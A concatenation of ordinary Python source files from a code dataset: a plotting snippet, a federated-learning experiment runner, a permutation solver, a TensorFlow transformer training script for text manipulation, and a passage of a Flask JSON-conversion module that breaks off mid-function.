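x = np.arange(-5, 6)
fig, axes = plt.subplots(nrows=2, ncols=2, figsize=(10, 10))
for ax, power in zip(axes.flat, range(1, 5)):
    ax.plot(x, x**power, ".-")
    ax.set_title(f"Polynomial curve of degree {power}")
fig.suptitle("Subplots exercise")
plt.show()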
+{"seq_id":"385856748","text":"import datetime\nfrom TINY_utils import TINY\nfrom paras.tiny import base\nfrom paras.tiny import cen_sing, cen_multi\nfrom paras.tiny import multi_cen_sing, multi_cen_multi\nfrom paras.tiny import diff_privacy_multi_001, diff_privacy_multi_002\nfrom paras.tiny import dis_multi, dis_sing\nfrom paras.tiny import foolsgold, geomedian\nfrom paras.tiny import double_pixel_multi, double_pixel_sing\nfrom paras.tiny import half_attack_multi, half_attack_sing\nfrom utils.csv_record import clear_all_record\n\nimport utils.utils\nimport logging\nimport argparse\n\nmode_list = ["cen", "multi_cen", "diff", "dis", "double_pix", "defense", "half_attack", "all"]\n\nlogger = logging.getLogger("main logger")\nlogger.setLevel(logging.INFO)\nlogger.addHandler(logging.StreamHandler())\n\ndef run_test(parameters, current_time, folder_name):\n    clear_all_record()\n    helper = TINY(current_time, folder_name, parameters)\n    helper.create_model()\n    helper.load_data()\n    utils.utils.train_process(helper)\n\ndef test_conf(base_para, choice_para, name):\n    base_para.update(choice_para)\n    current_time = datetime.datetime.now().strftime('%b.%d_%H.%M.%S')\n    run_test(base_para, current_time, "tiny_" + name)\n\nif __name__ == "__main__":\n    parser = argparse.ArgumentParser(description='mode')\n    parser.add_argument('--params', dest='params')\n    args = parser.parse_args()\n\n    mode = args.params\n    check_correctness = False\n\n    if mode == "cen" or mode == "all":\n        check_correctness = True\n        logger.info("Testing Centralized Multi-Shot on Tiny")\n        test_conf(base.parameter_base, cen_multi.parameters, "cen_multi")\n\n        logger.info("Testing Centralized Single-Shot on Tiny")\n        test_conf(base.parameter_base, cen_sing.parameters, "cen_sing")\n\n    if mode == "multi_cen" or mode == "all":\n        check_correctness = True\n        logger.info("Testing Multi-Distributed Multi-Shot on Tiny")\n        test_conf(base.parameter_base, multi_cen_multi.parameters, "multi_cen_multi")\n\n        logger.info("Testing Multi-Distributed Single-Shot on Tiny")\n        test_conf(base.parameter_base, multi_cen_sing.parameters, "multi_cen_sing")\n\n    if mode == "dis" or mode == "all":\n        check_correctness = True\n        logger.info("Testing Distributed Multi-Shot on Tiny")\n        test_conf(base.parameter_base, dis_multi.parameters, "dis_multi")\n\n        logger.info("Testing Distributed Single-Shot on Tiny")\n        test_conf(base.parameter_base, dis_sing.parameters, "dis_sing")\n\n    if mode == "diff" or mode == "all":\n        check_correctness = True\n        logger.info("Testing Diff-Privacy Multi-Shot on Tiny")\n        test_conf(base.parameter_base, diff_privacy_multi_002.parameters, "diff-002")\n\n        logger.info("Testing Diff-Privacy Single-Shot on Tiny")\n        test_conf(base.parameter_base, diff_privacy_multi_001.parameters, "diff-001")\n\n    if mode == "double_pix" or mode == "all":\n        check_correctness = True\n        logger.info("Testing Double Pixel Multi-Shot on Tiny")\n        test_conf(base.parameter_base, double_pixel_multi.parameters, "double_pix_multi")\n\n        logger.info("Testing Double Pixel Single-Shot on Tiny")\n        test_conf(base.parameter_base, double_pixel_sing.parameters, "double_pix_sing")\n\n    if mode == "defense" or mode == "all":\n        check_correctness = True\n        logger.info("Testing FoolsGold Multi-Shot on Tiny")\n        test_conf(base.parameter_base, foolsgold.parameters, "foolsgold")\n\n        logger.info("Testing GeoMedian Single-Shot on Tiny")\n        test_conf(base.parameter_base, geomedian.parameters, "geomedian")\n\n    if mode == "half_attack" or mode == "all":\n        check_correctness = True\n        logger.info("Testing Half Attack Multi-Shot on Tiny")\n        test_conf(base.parameter_base, half_attack_multi.parameters, "half_attack_multi")\n\n        logger.info("Testing Half Attack Single-Shot on Tiny")\n        test_conf(base.parameter_base, half_attack_sing.parameters, "half_attack_sing")\n\n    if not check_correctness:\n        print("Mode Error! Choose from these settings: ", mode_list)\n","sub_path":"TINY.py","file_name":"TINY.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"177821823","text":"import math\n\nclass Solution(object):\n    def getPermutation(self, n, k):\n        \"\"\"\n        :type n: int\n        :type k: int\n        :rtype: str\n        \"\"\"\n        # use iteration\n        fact = math.factorial(n)\n        if k > fact: return ""\n        k -= 1  # count from 0 in this program\n        res = []\n        nums = [str(x) for x in range(1, n+1)]  # candidate digits in order\n        while len(nums) > 1:\n            fact = fact // n  # integer division keeps q usable as an index\n            q, r = divmod(k, fact)\n            res.append(nums[q])\n            nums = nums[:q] + nums[q+1:]\n            k = r\n            n -= 1\n        res.append(nums[0])\n        return ''.join(res)\n","sub_path":"get_permutation/iteration.py","file_name":"iteration.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"407297914","text":"#!/usr/bin/env python3\n\"\"\"\nText Content Manipulation\n3-gated copy net.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# pylint: disable=invalid-name, no-member, too-many-locals\n\nimport importlib\nimport os\nimport numpy as np\nimport tensorflow as tf\nimport texar as tx\nprint('path is {}'.format(tx.__path__))\nimport pickle\nfrom texar.core import get_train_op\nfrom utils_e2e_clean import *\n# from ie import get_precrec\nfrom texar.modules import TransformerEncoder, TransformerDecoder, TransformerCopyDecoder\nfrom texar.utils import transformer_utils\n\n\nflags = tf.flags\nflags.DEFINE_string("data_type", "e2e", "Dataset to evaluate: nba or e2e")\nflags.DEFINE_string("config_data", "config_data_e2e_clean", "The data config.")\nflags.DEFINE_string("config_model", "config_model_transformer", "The model config.")\nflags.DEFINE_string("config_train", "config_train", "The training config.")\nflags.DEFINE_float("rec_w", 0.8, "Weight of reconstruction loss.")\nflags.DEFINE_float("rec_w_rate", 0., "Increasing rate of rec_w.")\nflags.DEFINE_boolean("add_bleu_weight", False, "Whether to multiply BLEU weight"\n                     " onto the first loss.")\nflags.DEFINE_string("expr_name", "e2e_dis_less3_output", "The experiment name. "\n                    "Used as the directory name of run.")\nflags.DEFINE_string("restore_from", "", "The specific checkpoint path to "\n                    "restore from. 
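A brute-force cross-check for getPermutation above (illustrative; itertools emits permutations of a sorted sequence in lexicographic order, so the k-th permutation is simply the (k-1)-th element):

from itertools import permutations
sol = Solution()
perms = ["".join(p) for p in permutations("1234")]  # already lexicographic
for k in range(1, 25):                               # n = 4 has 24 permutations
    assert sol.getPermutation(4, k) == perms[k - 1]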
If not specified, the latest checkpoint in \"\n \"expr_name is used.\")\nflags.DEFINE_boolean(\"copy_x\", False, \"Whether to copy from x.\")\nflags.DEFINE_boolean(\"copy_y_\", False, \"Whether to copy from y'.\")\nflags.DEFINE_boolean(\"coverage\", False, \"Whether to add coverage onto the copynets.\")\nflags.DEFINE_float(\"exact_cover_w\", 0., \"Weight of exact coverage loss.\")\nflags.DEFINE_float(\"eps\", 1e-10, \"epsilon used to avoid log(0).\")\nflags.DEFINE_integer(\"disabled_vocab_size\", 0, \"Disabled vocab size.\")\nflags.DEFINE_boolean(\"attn_x\", False, \"Whether to attend x.\")\nflags.DEFINE_boolean(\"attn_y_\", False, \"Whether to attend y'.\")\nflags.DEFINE_boolean(\"x_path\", False, \"Whether to add structured data path.\")\nflags.DEFINE_float(\"x_path_multiplicator\", 1., \"Structured data path multiplicator.\")\nflags.DEFINE_float(\"x_path_addend\", 0., \"Structured data path addend.\")\nflags.DEFINE_boolean(\"align\", False, \"Whether it is to get alignment.\")\nflags.DEFINE_boolean(\"output_align\", False, \"Whether to output alignment.\")\nflags.DEFINE_boolean(\"verbose\", False, \"verbose.\")\nflags.DEFINE_boolean(\"eval_ie\", False, \"Whether evaluate IE.\")\nflags.DEFINE_integer(\"eval_ie_gpuid\", 3, \"ID of GPU on which IE runs.\")\nFLAGS = flags.FLAGS\n\ncopy_flag = FLAGS.copy_x or FLAGS.copy_y_\nattn_flag = FLAGS.attn_x or FLAGS.attn_y_\n\nif FLAGS.output_align:\n FLAGS.align = True\n\nconfig_data = importlib.import_module(FLAGS.config_data)\nconfig_model = importlib.import_module(FLAGS.config_model)\nconfig_train = importlib.import_module(FLAGS.config_train)\nexpr_name = FLAGS.expr_name\nrestore_from = FLAGS.restore_from\n\ndir_summary = os.path.join(expr_name, 'log')\ndir_model = os.path.join(expr_name, 'ckpt')\ndir_best = os.path.join(expr_name, 'ckpt-best')\nckpt_model = os.path.join(dir_model, 'model.ckpt')\nckpt_best = os.path.join(dir_best, 'model.ckpt')\n\n\ndef get_optimistic_restore_variables(ckpt_path, graph=tf.get_default_graph()):\n reader = tf.train.NewCheckpointReader(ckpt_path)\n saved_shapes = reader.get_variable_to_shape_map()\n var_names = sorted([\n (var.name, var.name.split(':')[0]) for var in tf.global_variables()\n if var.name.split(':')[0] in saved_shapes])\n restore_vars = []\n for var_name, saved_var_name in var_names:\n var = graph.get_tensor_by_name(var_name)\n var_shape = var.get_shape().as_list()\n if var_shape == saved_shapes[saved_var_name]:\n restore_vars.append(var)\n return restore_vars\n\n\ndef get_optimistic_saver(ckpt_path, graph=tf.get_default_graph()):\n return tf.train.Saver(\n get_optimistic_restore_variables(ckpt_path, graph=graph))\n\n\ndef build_model(data_batch, data, step):\n batch_size, num_steps = [\n tf.shape(data_batch[\"x_value_text_ids\"])[d] for d in range(2)]\n vocab = data.vocab('y_aux')\n\n id2str = '<{}>'.format\n bos_str, eos_str = map(id2str, (vocab.bos_token_id, vocab.eos_token_id))\n\n def single_bleu(ref, hypo):\n ref = [id2str(u if u != vocab.unk_token_id else -1) for u in ref]\n hypo = [id2str(u) for u in hypo]\n\n ref = tx.utils.strip_special_tokens(\n ' '.join(ref), strip_bos=bos_str, strip_eos=eos_str)\n hypo = tx.utils.strip_special_tokens(\n ' '.join(hypo), strip_eos=eos_str)\n\n return 0.01 * tx.evals.sentence_bleu(references=[ref], hypothesis=hypo)\n\n\n\n # losses\n losses = {}\n\n # embedders\n embedders = {\n name: tx.modules.WordEmbedder(\n vocab_size=data.vocab(name).size, hparams=hparams)\n for name, hparams in config_model.embedders.items()}\n\n # encoders\n y_encoder = 
tx.modules.TransformerEncoder(\n hparams=config_model.y_encoder)\n x_encoder = tx.modules.TransformerEncoder(\n hparams=config_model.x_encoder)\n\n\n def concat_encoder_outputs(outputs):\n return tf.concat(outputs, -1)\n\n\n def encode(ref_flag):\n y_str = y_strs[ref_flag]\n y_ids = data_batch['{}_text_ids'.format(y_str)]\n y_embeds = embedders['y_aux'](y_ids)\n y_sequence_length = data_batch['{}_length'.format(y_str)]\n y_enc_outputs = y_encoder(\n y_embeds, sequence_length=y_sequence_length)\n y_enc_outputs = concat_encoder_outputs(y_enc_outputs)\n\n x_str = x_strs[ref_flag]\n x_ids = {\n field: data_batch['{}_{}_text_ids'.format(x_str, field)][:, 1:-1]\n for field in x_fields}\n x_embeds = tf.concat(\n [embedders['x_{}'.format(field)](x_ids[field]) for field in x_fields],\n axis=-1)\n\n x_sequence_length = data_batch[\n '{}_{}_length'.format(x_str, x_fields[0])] - 2\n x_enc_outputs = x_encoder(\n x_embeds, sequence_length=x_sequence_length)\n x_enc_outputs = concat_encoder_outputs(x_enc_outputs)\n\n return y_ids, y_embeds, y_enc_outputs, y_sequence_length, \\\n x_ids, x_embeds, x_enc_outputs, x_sequence_length\n\n\n encode_results = [encode(ref_flag) for ref_flag in range(2)]\n y_ids, y_embeds, y_enc_outputs, y_sequence_length, \\\n x_ids, x_embeds, x_enc_outputs, x_sequence_length = \\\n zip(*encode_results)\n\n # get rnn cell\n # rnn_cell = tx.core.layers.get_rnn_cell(config_model.rnn_cell)\n\n\n def get_decoder( y__ref_flag, x_ref_flag, tgt_ref_flag,\n beam_width=None):\n output_layer_params = \\\n {'output_layer': tf.identity} if copy_flag else {'vocab_size': vocab.size}\n\n\n if attn_flag: # attention\n memory = tf.concat(\n [y_enc_outputs[y__ref_flag],\n x_enc_outputs[x_ref_flag]],\n axis=1)\n memory_sequence_length = None\n copy_memory_sequence_length = None\n\n tgt_embedding = tf.concat(\n [tf.zeros(shape=[1, embedders['y_aux'].dim]), embedders['y_aux'].embedding[1:, :]], axis=0)\n decoder = tx.modules.TransformerCopyDecoder(\n embedding=tgt_embedding,\n hparams=config_model.decoder)\n\n return decoder\n\n def get_decoder_and_outputs(\n y__ref_flag, x_ref_flag, tgt_ref_flag, params,\n beam_width=None):\n decoder = get_decoder(\n y__ref_flag, x_ref_flag, tgt_ref_flag,\n beam_width=beam_width)\n if beam_width is None:\n ret = decoder(**params)\n else:\n ret = decoder(\n beam_width=beam_width,\n **params)\n return decoder, ret\n\n get_decoder_and_outputs = tf.make_template(\n 'get_decoder_and_outputs', get_decoder_and_outputs)\n\n gamma = tf.Variable(1, dtype=tf.float32, trainable=True)\n gamma = tf.exp(tf.log(gamma))\n\n def teacher_forcing(y__ref_flag, x_ref_flag, loss_name):\n tgt_flag = x_ref_flag\n tgt_str = y_strs[tgt_flag]\n memory_sequence_length = tf.add(y_sequence_length[y__ref_flag] - 1, x_sequence_length[x_ref_flag])\n sequence_length = data_batch['{}_length'.format(tgt_str)] - 1\n\n memory = tf.concat(\n [y_enc_outputs[y__ref_flag],\n x_enc_outputs[x_ref_flag]],\n axis=1) # [64 61 384]\n\n decoder, rets = get_decoder_and_outputs(\n y__ref_flag, x_ref_flag, tgt_flag,\n {\n 'memory': memory, #print_mem,\n 'memory_sequence_length': memory_sequence_length,\n 'copy_memory': x_enc_outputs[x_ref_flag],\n 'copy_memory_sequence_length': x_sequence_length[x_ref_flag],\n 'source_ids': x_ids[x_ref_flag]['value'], #print_ids, # source_ids\n 'gamma': gamma,\n 'decoding_strategy': 'train_greedy',\n 'inputs': y_embeds[tgt_flag][:, :-1, :], #[:, 1:, :], #target yence embeds (ignore )\n 'alpha': config_model.alpha,\n 'sequence_length': sequence_length,\n 'mode': 
tf.estimator.ModeKeys.TRAIN})\n\n tgt_y_ids = data_batch['{}_text_ids'.format(tgt_str)][:, 1:] # ground_truth ids (ignore )\n tf_outputs = rets[0]\n gens = rets[2]\n loss = tx.losses.sequence_sparse_softmax_cross_entropy(\n labels=tgt_y_ids,\n logits=tf_outputs.logits,\n sequence_length=data_batch['{}_length'.format(tgt_str)] - 1)\n # average_across_timesteps=True,\n # sum_over_timesteps=False)\n # loss = tf.reduce_mean(loss, 0)\n\n if copy_flag and FLAGS.exact_cover_w != 0:\n # sum_copy_probs = list(map(lambda t: tf.cast(t, tf.float32), final_state.sum_copy_probs))\n copy_probs = (1 - gens) * rets[1]\n sum_copy_probs = tf.reduce_sum(copy_probs, 1)\n # sum_copy_probs = tf.split(sum_copy_probs, tf.shape(sum_copy_probs)[0], axis=0)#list(map(lambda prob: tf.cast(prob, tf.float32), tuple(tf.reduce_sum(copy_probs, 1)))) #[batch_size, len_key]\n memory_lengths = x_sequence_length[x_ref_flag]#[len for len in sd_sequence_length[x_ref_flag]]\n exact_coverage_loss = \\\n tf.reduce_mean(tf.reduce_sum(\n tx.utils.mask_sequences(\n tf.square(sum_copy_probs - 1.), memory_lengths),\n 1))\n print_xe_loss_op = tf.print(loss_name, 'xe loss:', loss)\n with tf.control_dependencies([print_xe_loss_op]):\n print_op = tf.print(loss_name, 'exact coverage loss :', exact_coverage_loss)\n with tf.control_dependencies([print_op]):\n loss += FLAGS.exact_cover_w * exact_coverage_loss\n losses[loss_name] = loss\n\n return decoder, rets, loss, tgt_y_ids\n\n\n def beam_searching(y__ref_flag, x_ref_flag, beam_width):\n start_tokens = tf.ones_like(data_batch['y_aux_length']) * \\\n vocab.bos_token_id\n end_token = vocab.eos_token_id\n memory_sequence_length = tf.add(y_sequence_length[y__ref_flag] - 1, x_sequence_length[x_ref_flag])\n sequence_length = data_batch['{}_length'.format(y_strs[y__ref_flag])] - 1\n\n memory = tf.concat(\n [y_enc_outputs[y__ref_flag],\n x_enc_outputs[x_ref_flag]],\n axis=1)\n source_ids = tf.concat(\n [y_ids[y__ref_flag],\n x_ids[x_ref_flag]['value']], axis=1)\n\n #decoder, (bs_outputs, seq_len)\n decoder, bs_outputs = get_decoder_and_outputs(\n y__ref_flag, x_ref_flag, None,\n {\n 'memory': memory, #print_mem,\n 'memory_sequence_length': memory_sequence_length,\n 'copy_memory': x_enc_outputs[x_ref_flag],\n 'copy_memory_sequence_length': x_sequence_length[x_ref_flag],\n 'gamma':gamma,\n 'source_ids': x_ids[x_ref_flag]['value'],# source_ids,#x_ids[x_ref_flag]['entry'], #[ batch_size, source_length]\n # 'decoding_strategy': 'infer_sample', only for random sampling\n 'alpha': config_model.alpha,\n 'start_tokens': start_tokens,\n 'end_token': end_token,\n 'max_decoding_length': config_train.infer_max_decoding_length},\n beam_width=beam_width)\n\n return decoder, bs_outputs, sequence_length, start_tokens\n\n\n\n decoder, rets, loss, tgt_y_ids = teacher_forcing(1, 0, 'MLE')\n rec_decoder, _, rec_loss, _ = teacher_forcing(1, 1, 'REC')\n rec_weight = FLAGS.rec_w + FLAGS.rec_w_rate * tf.cast(step, tf.float32)\n step_stage = tf.cast(step, tf.float32) / tf.constant(600.0)\n rec_weight = tf.case([(tf.less_equal(step_stage, tf.constant(1.0)), lambda: tf.constant(1.0)), \\\n (tf.greater(step_stage, tf.constant(2.0)), lambda: FLAGS.rec_w)], \\\n default=lambda: tf.constant(1.0) - (step_stage - 1) * (1 - FLAGS.rec_w))\n joint_loss = (1 - rec_weight) * loss + rec_weight * rec_loss\n losses['joint'] = joint_loss\n\n tiled_decoder, bs_outputs, sequence_length, start_tokens = beam_searching(\n 1, 0, config_train.infer_beam_width)\n\n train_ops = {\n name: get_train_op(losses[name], hparams=config_train.train[name])\n 
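The tf.case schedule above, restated in plain Python to make the annealing visible (same breakpoints; the 600 comes from the tf.constant in the code and rec_w stands for FLAGS.rec_w):

def rec_weight_schedule(step, rec_w):
    # full reconstruction weight for the first 600 steps, linear decay to
    # rec_w by step 1200, then constant at rec_w
    stage = step / 600.0
    if stage <= 1.0:
        return 1.0
    if stage > 2.0:
        return rec_w
    return 1.0 - (stage - 1.0) * (1.0 - rec_w)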
for name in config_train.train}\n\n return train_ops, bs_outputs, rets, sequence_length, tgt_y_ids, start_tokens, gamma\n\n\ndef main():\n # data batch\n datasets = {mode: tx.data.MultiAlignedData(hparams)\n for mode, hparams in config_data.datas.items()}\n data_iterator = tx.data.FeedableDataIterator(datasets)\n data_batch = data_iterator.get_next()\n\n global_step = tf.train.get_or_create_global_step()\n\n train_ops, bs_outputs, rets, sequence_length, tgt_y_ids, start_tokens, gamma = build_model(data_batch, datasets['train'], global_step)\n\n mle_outputs = rets[0]\n attn_probs = rets[1]\n copy_probs = rets[1] * (1 - rets[2])\n gens = rets[2]\n # source_text = rets[3]\n preds = tf.to_int32(tf.argmax(mle_outputs.logits, axis=-1))\n\n summary_ops = {\n name: tf.summary.merge(\n tf.get_collection(\n tf.GraphKeys.SUMMARIES,\n scope=get_scope_name_of_train_op(name)),\n name=get_scope_name_of_summary_op(name))\n for name in train_ops.keys()}\n\n saver = tf.train.Saver(max_to_keep=None)\n\n global best_ever_val_bleu\n best_ever_val_bleu = 0.\n\n\n def _save_to(directory, step):\n print('saving to {} ...'.format(directory))\n\n saved_path = saver.save(sess, directory, global_step=step)\n\n print('saved to {}'.format(saved_path))\n\n\n def _restore_from_path(ckpt_path):\n print('restoring from {} ...'.format(ckpt_path))\n\n try:\n saver.restore(sess, ckpt_path)\n except tf.errors.NotFoundError:\n print('Some variables are missing. Try optimistically restoring.')\n (get_optimistic_saver(ckpt_path)).restore(sess, ckpt_path)\n\n print('done.')\n\n\n def _restore_from(directory):\n if os.path.exists(directory):\n ckpt_path = tf.train.latest_checkpoint(directory)\n _restore_from_path(ckpt_path)\n\n else:\n print('cannot find checkpoint directory {}'.format(directory))\n\n\n\n def _train_epoch(sess, summary_writer, mode, train_op, summary_op, mle_outputs):\n print('in _train_epoch')\n\n data_iterator.restart_dataset(sess, mode)\n feed_dict = {\n tx.global_mode(): tf.estimator.ModeKeys.TRAIN,\n data_iterator.handle: data_iterator.get_handle(sess, mode),\n }\n\n cnt = 0\n\n while True:\n try:\n loss, summary, tf_outputs, ground_truth, _gamma = \\\n sess.run((train_op, summary_op, mle_outputs, tgt_y_ids, gamma), feed_dict)\n\n step = tf.train.global_step(sess, global_step)\n\n print('step {:d}: loss = {:.6f} gamma = {:.4f}'.format(step, loss, _gamma))\n\n summary_writer.add_summary(summary, step)\n\n\n # if step % config_train.steps_per_eval == 0:\n # _eval_epoch(sess, summary_writer, 'val')\n # # _eval_epoch(sess, summary_writer, 'test')\n\n # if step > 921 and (step % 100 == 0):\n # _eval_epoch(sess, summary_writer, 'val')\n\n\n except tf.errors.OutOfRangeError:\n break\n\n print('end _train_epoch')\n\n\n def _eval_epoch(sess, summary_writer, mode):\n global best_ever_val_bleu\n\n print('in _eval_epoch with mode {}'.format(mode))\n\n data_iterator.restart_dataset(sess, mode)\n feed_dict = {\n tx.global_mode(): tf.estimator.ModeKeys.EVAL,\n data_iterator.handle: data_iterator.get_handle(sess, mode)\n }\n\n step = tf.train.global_step(sess, global_step)\n\n ref_hypo_pairs = []\n fetches = [\n [data_batch['y_aux_text'], data_batch['y_ref_text']],\n bs_outputs['sample_id'],#[:, :, 0],\n #bs_outputs.sample_id,\n sequence_length,\n tgt_y_ids,\n start_tokens,\n ]\n\n if not os.path.exists(dir_model):\n os.makedirs(dir_model)\n\n hypo_file_name = os.path.join(\n dir_model, \"hypos.step{}.{}.txt\".format(step, mode))\n hypo_file = open(hypo_file_name, \"w\")\n\n cnt = 0\n while True:\n try:\n target_texts, 
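_eval_epoch below scores the hypotheses against each reference set separately via corpus_bleu (imported from utils_e2e_clean); a hedged stand-in using NLTK's similarly shaped API, just to show the expected nesting of references:

from nltk.translate.bleu_score import corpus_bleu as nltk_corpus_bleu
refs = [[["the", "cat", "sat", "down"]]]     # one list of references per hypothesis
hypos = [["the", "cat", "sat", "down"]]
score = 100 * nltk_corpus_bleu(refs, hypos)  # ~100.0 for an exact 4-gram match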
bs_ids, seq_length, ground_truth, _start_tokens = sess.run(fetches, feed_dict)\n target_texts = [\n tx.utils.strip_special_tokens(\n texts[:, 1:].tolist(), is_token_list=True)\n for texts in target_texts]\n output_ids = bs_ids[:, :, 0]\n output_texts = tx.utils.map_ids_to_strs(\n ids=output_ids.tolist(), vocab=datasets[mode].vocab('y_aux'),\n join=False)\n\n target_texts = list(zip(*target_texts))\n\n for ref, hypo in zip(target_texts, output_texts):\n if cnt < 10:\n print('cnt = {}'.format(cnt))\n for i, s in enumerate(ref):\n print('ref{}: {}'.format(i, ' '.join(s)))\n print('hypo: {}'.format(' '.join(hypo)))\n print(' '.join(hypo), file=hypo_file)\n cnt += 1\n print('processed {} samples'.format(cnt))\n\n ref_hypo_pairs.extend(zip(target_texts, output_texts))\n\n except tf.errors.OutOfRangeError:\n break\n\n hypo_file.close()\n\n\n refs, hypos = zip(*ref_hypo_pairs)\n bleus = []\n get_bleu_name = '{}_BLEU'.format\n print('In {} mode:'.format(mode))\n for i in range(0, 2):\n refs_ = list(map(lambda ref: ref[i:i+1], refs))\n bleu = corpus_bleu(refs_, hypos)\n print('{}: {:.2f}'.format(get_bleu_name(i), bleu))\n bleus.append(bleu)\n\n summary = tf.Summary()\n for i, bleu in enumerate(bleus):\n summary.value.add(\n tag='{}/{}'.format(mode, get_bleu_name(i)), simple_value=bleu)\n if FLAGS.eval_ie and mode == 'test':\n for name, value in {'precision': prec, 'recall': rec}.items():\n summary.value.add(tag='{}/{}'.format(mode, name),\n simple_value=value)\n summary_writer.add_summary(summary, step)\n summary_writer.flush()\n\n bleu = bleus[0]\n if mode == 'val':\n if bleu > best_ever_val_bleu:\n best_ever_val_bleu = bleu\n print('updated best val bleu: {}'.format(bleu))\n\n _save_to(ckpt_best, step)\n\n print('end _eval_epoch')\n return bleu\n\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n sess.run(tf.local_variables_initializer())\n sess.run(tf.tables_initializer())\n\n if restore_from:\n _restore_from_path(restore_from)\n else:\n _restore_from(dir_model)\n\n\n summary_writer = tf.summary.FileWriter(\n dir_summary, sess.graph, flush_secs=30)\n\n epoch = 0\n while epoch < config_train.max_epochs:\n name = 'align' if FLAGS.align else 'joint'\n train_op = train_ops[name]\n summary_op = summary_ops[name]\n\n val_bleu = _eval_epoch(sess, summary_writer, 'val')\n step = tf.train.global_step(sess, global_step)\n\n print('epoch: {} ({}), step: {}, '\n 'val BLEU: {:.2f}'.format(\n epoch, name, step, val_bleu))\n\n _train_epoch(sess, summary_writer, 'train', train_op, summary_op, mle_outputs)\n\n epoch += 1\n\n step = tf.train.global_step(sess, global_step)\n _save_to(ckpt_model, step)\n\n test_bleu = _eval_epoch(sess, summary_writer, 'test')\n print('epoch: {}, test BLEU: {}'.format(epoch, test_bleu))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"manip_e2e_transformer.py","file_name":"manip_e2e_transformer.py","file_ext":"py","file_size_in_byte":21324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"371217634","text":"#!/usr/bin/python\n\"\"\" backend --> converter file \"\"\"\nimport os\nimport sys\nsys.path.append(os.path.dirname(__file__))\nfrom flask import current_app\n\nfrom YON.be_surveys import be_getSurveyData\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonChat_toArr\n*** server: back end\n*** Description: convert json of chat in group to array of msges\n*** Arguments: jsonChat\n*** Return: array of 
messages\n=========================================================================\"\"\"\ndef be_convertJsonChat_toArr(json_chat=None):\n    \"\"\" return array of the chat msgs \"\"\"\n    msgs_arr = []\n    if json_chat:\n        if 'last' in json_chat:\n            json_chat.pop('last')\n        msgs_ids = list(json_chat.keys())\n\n        for msg_id in msgs_ids:\n            msg = json_chat[msg_id]\n            msg['sender_id'] = str(msg['sender_id'])\n            msgs_arr.append(msg)\n    return msgs_arr\n\n\n
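Illustrative input/output for the chat converter above (the 'last' bookkeeping key is dropped and sender ids are stringified):

chat = {"m1": {"sender_id": 42, "text": "hi"}, "last": "m1"}
assert be_convertJsonChat_toArr(chat) == [{"sender_id": "42", "text": "hi"}]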
\"\"\"========================================================================\n*** Function: be_convertJsonMembers_toArr \n*** server: back end\n*** Description: convert json of members/admin in group to array of members\n*** Arguments: jsonMembers\n*** Return: array of members/admins\n=========================================================================\"\"\"\ndef be_convertJsonMembers_toArr(json_members=None, user_contacts=None):\n    \"\"\" return array of members for group \"\"\"\n    current_app.logger.debug('be_convertJsonMembers_toArr, json_members {0}'.format(json_members))\n    members_arr = []\n    if json_members:\n        members_ids = json_members.keys()\n        for member_id in members_ids:\n            members_arr.append(member_id)\n\n    return members_arr\n\n\"\"\"========================================================================\n*** Function: be_convertJsonLists_toArr\n*** server: back end\n*** Description: get survey list as array of lists\n*** Arguments: jsonLists\n*** Return: array of lists\n=========================================================================\"\"\"\ndef be_convertJsonLists_toArr(jsonLists=None):\n    \"\"\" return array of lists for survey \"\"\"\n    lists_arr = []\n    if 'last' in jsonLists:\n        jsonLists.pop('last')\n    lists_ids = jsonLists.keys()\n    for list_id in lists_ids:\n        current_list = jsonLists[list_id]\n        current_list['id'] = str(list_id)\n        list_items_arr = []\n        if 'items' in jsonLists[list_id]:\n            list_items_arr = be_convertJsonItems_toArr(jsonLists[list_id]['items'])\n        current_list['items'] = list_items_arr\n\n        lists_arr.append(current_list)\n    return lists_arr\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonItems_toArr\n*** server: back end\n*** Description: get list items as array of items\n*** Arguments: jsonItems\n*** Return: array of items\n=========================================================================\"\"\"\ndef be_convertJsonItems_toArr(json_items=None):\n    \"\"\" return array of items for list id \"\"\"\n    items_arr = []\n    if json_items:\n        if 'last' in json_items:\n            json_items.pop('last')\n        items_ids = list(json_items.keys())\n        for item_id in items_ids:\n            item = json_items[item_id]\n            item['id'] = str(item_id)\n\n            #Fetch owners for item\n            item_owners = []\n            if 'owners' in item and item['owners'] is not None:\n                item_owners = be_convertJsonOwners_toArr(item['owners'])\n            item['owners'] = item_owners\n\n            items_arr.append(item)\n    return items_arr\n\n\"\"\"========================================================================\n*** Function: be_convertJsonOwners_toArr\n*** server: back end\n*** Description: get owners of item as array of owners\n*** Arguments: jsonOwners\n*** Return: array of owners\n=========================================================================\"\"\"\ndef be_convertJsonOwners_toArr(json_owners=None):\n    \"\"\" return list of selections for item in list \"\"\"\n    owners = []\n    if json_owners:\n        answers_ids = json_owners.keys()\n        for user_id in answers_ids:\n            user = {'id': user_id}\n            owners.append(user)\n    return owners\n\n\n\"\"\"========================================================================\n*** Function: be_convertJsonQuestions_toArr\n*** server: back end\n*** Description: convert the json question to array of questions\n*** Arguments: jsonQuestion\n*** Return: array of questions\n=========================================================================\"\"\"\ndef be_convertJsonQuestions_toArr(jsonQuestions=None):\n    \"\"\" be_convertJsonQuestions_toArr \"\"\"\n    questions_arr = []\n    if jsonQuestions:\n        if 'last' in jsonQuestions:\n            jsonQuestions.pop('last')\n        questions_id_list = list(jsonQuestions.keys())\n        for question_id in questions_id_list:\n            questions_arr.append(jsonQuestions[question_id])\n            questions_arr[-1]['id'] = str(question_id)\n    return questions_arr\n\n\"\"\"========================================================================\n*** Function: be_convertJsonSurveysData_toArr\n*** server: back end\n*** Description: convert the json surveys from db to array of surveys\n*** Arguments: jsonSurveys\n*** Return: array of surveys\n=========================================================================\"\"\"\ndef be_convertJsonSurveysData_toArr(json_surveys=None):\n    \"\"\" return array of surveys \"\"\"\n    surveys_arr = []\n    if json_surveys:\n        if 'last' in json_surveys:\n            json_surveys.pop('last')\n        